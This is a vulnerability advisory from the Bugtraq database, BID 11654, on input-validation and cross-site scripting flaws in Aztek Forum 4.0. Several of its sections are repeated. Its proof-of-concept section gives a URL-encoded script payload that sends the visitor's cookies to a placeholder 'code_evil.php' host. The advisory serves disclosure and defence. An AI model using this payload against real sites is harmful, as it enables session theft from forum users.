Aztek Forum Multiple Input Validation Vulnerabilities
BID:11654
Info
Aztek Forum Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 11654 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 12 2004 12:00AM |
| Updated: | Nov 12 2004 12:00AM |
| Credit: | Discovery is credited to benji lemien <[email protected]>. |
| Vulnerable: |
Aztek Forum Aztek Forum 4.0 |
| Not Vulnerable: | |
Discussion
Aztek Forum Multiple Input Validation Vulnerabilities
Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.
All versions of Aztek Forum are considered vulnerable at the moment.
Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.
All versions of Aztek Forum are considered vulnerable at the moment.
Exploit / POC
Aztek Forum Multiple Input Validation Vulnerabilities
An exploit is not required.
The following proof of concept example is available:
http://www.example.com/forum%20aztek/forum_2.php?msg=10
&return=')%3C/script%3E%3Cscript%3E%20% 20document.location=%20'www.example.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E
An exploit is not required.
The following proof of concept example is available:
http://www.example.com/forum%20aztek/forum_2.php?msg=10
&return=')%3C/script%3E%3Cscript%3E%20% 20document.location=%20'www.example.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E
Solution / Fix
Aztek Forum Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Aztek Forum Multiple Input Validation Vulnerabilities
References:
References:
- Aztek Forum Home Page (Aztek Forum)
- Aztek Forum Input Validation Holes (SecurityTracker)